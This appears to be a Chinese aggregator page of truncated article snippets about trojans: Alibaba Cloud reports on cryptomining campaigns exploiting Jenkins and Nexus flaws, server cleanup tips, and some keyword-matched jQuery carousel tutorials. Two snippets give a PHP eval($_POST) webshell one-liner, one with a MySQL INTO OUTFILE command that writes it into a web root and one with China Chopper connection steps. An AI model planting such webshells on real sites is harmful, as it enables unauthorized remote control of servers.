挖矿木马是一类利用漏洞入侵计算机，并植入挖矿软件挖掘加密数字货币牟利的木马，被植入挖矿木马的计算机会出现CPU使用率飙升、系统卡顿、业务服务无法正常使用等情况。挖矿木马为了能够长期在服务器中驻留，会采用多种安全对抗技术，如修改计划任务、防火墙配置、系统动态链接库等，这些技术手段严重时可能造成服务器业务中断。挖矿木马最早...

阿里云安全于近日捕获到一起使用JenkinsRCE漏洞进行攻击的挖矿事件。除挖矿外，攻击者还曾植入具有C&C功能的tsunami木马，也预留了反弹shell的功能，给用户带来极大安全隐患。由于攻击者直接复制了Jenkins系列漏洞发现者（Orange.tw）在博客上公布的poc，攻击payload含有"Oran...

背景近日，阿里云安全监测到watchbog挖矿木马使用新曝光的NexusRepositoryManager3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件。值得注意的是，这一攻击开始的时间（2月24日），与2月5日上述产品的母公司发布漏洞公告，相隔仅仅半个多月，再次印证了“漏洞从曝光到被黑产用于挖矿...

前言比特币等虚拟货币在2019年迎来了久违的大幅上涨，从最低3000美元上涨至7月份的14000美元，涨幅达300%，巨大的金钱诱惑使得更多的黑产团伙加入了恶意挖矿的行列。阿里云安全团队通过对云上僵尸网络家族的监控，发现恶意挖矿已成为黑产团伙主要的牟利方式。2019年共监控到58个成规模的挖矿木马团伙(数据截止到8月底...

 利用mysql写入一句话木马前提：　　root权限，知道了服务器的web的绝对路径select"<?php@eval($_POST['pass']);?>"INTOOUTFILE"D:\WWW\22.php"如果执行成功，生成D:WWW22.php，并写入<?php@eval($_POST...

一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过waf的检测，一句话木马出现了无数中变形，但本质是不变的：木马的函数执行了发送的命令。通过GET、POST、COOKIE这三种方式向一个网站提交数据一句话木马用$_GET['']、$_POST['']、$_COOKIE[''] ...

最近由于网络环境安全意识低的原因，导致一些云服务器ECS中了挖矿病毒的坑。总结了一些解决挖矿病毒的一些思路。由于病毒更新速度快仅供参考。1、查看cpu爆满的进程cpu占用率 100%,用top查看cpu1002、杀死进程kill-9 pid 杀死进程后，过一分钟该进程又起来了或者删掉此进程...

　　网站安全中，对目录的执行权限是非常敏感的，一般来说，可以写入的目录是不能够拥有脚本的执行权限的，可写入的目录如：data、uploads，data目录主要是基本配置文件和缓存数据，uploads则是附件上传保存的目录，本篇将针对不同服务器环境来介绍如何取消这些目录的执行权限，当然我们也建议用户其他一些生成纯静态ht...

最近看了很多博友反馈的问题，发现最近一周谈论最多的问题就是“js挂马”的问题。问题也大多集中在如何挂马、挂马的方法有哪些？挂马的效果和如何防止自己网站被挂木马。当然也有一些博友说《常见JS挂马方法及如何防止网站被黑客挂马？》的文章介绍的js挂马方法不全。也给我列举了几种文章中未提及到的挂马方法，事后根据博友的反馈我也总...

 PHP的一句话木马内容如下：<?php @eval($_POST['chopper']);?>  将这个木马放到“网站”中，打开中国菜刀，在空白处点击鼠标右键，选择“添加”选项。编辑相关参数，包括一句话木马所在的URL...

项目中要用到旋转木马效果，一共5张图片轮播，并且点击对应的索引按钮能切换到对应的图片。本效果实在jquery.carousel.js插件的基础上做了一些改进，以实现上述需求。效果图如下：代码：HTML：<!doctypehtml><htmllang="zh"><head><me...

项目中需要用到旋转木马效果，但是我在网上找的插件，基本都是不带按钮或者只是带前后按钮的，而项目要求的是带索引按钮，也就是说有3张图片轮播，对应的要有3个小按钮，点击按钮，对应的图片位于中间位置。于是就在jQuery的一款插件jquery.carousel.js的基础上进行了一些改进，不足的是，固定就是3张图片。代码：h...

效果展示连接 http://www.jqcool.net/demo/201405/jquery-slick/今天刚接触这个插件，被这插件搞的大脑风暴了所以来记录一下使用方法首先注意一点不特别标注slide:'li'就只对div管用 引入<linkhref="css/slick.css"rel=...

问题现象Linux服务器收到报警信息，主机CPU跑满。自动创建运行Docker容器xmrig，导致其他运行中容器被迫停止。问题原因通过top命令可以看到有一个xmrig进程占用了99%的CPU。经定位，该进程是一个挖矿木马程序，通过上述截图可以看到进程对应的PID为2647，根据进程ID查询一下产生进程的程序路径：ll...

过年回来上班，听领导说咱网站有时候会跳转到澳门赌博网页的？？？吓得我感紧打开网站看看，咦。。。正常啊，擦擦额头上的汗，院子里找了一堆处理木马的法子，也不知道有没有用，先存着，说不定哪天就用上了呢。　　下面转入正题，如果网站被挂马，又找不到被挂马的网页吗可以在网页中插入以下代码。解决方案1：<script>　...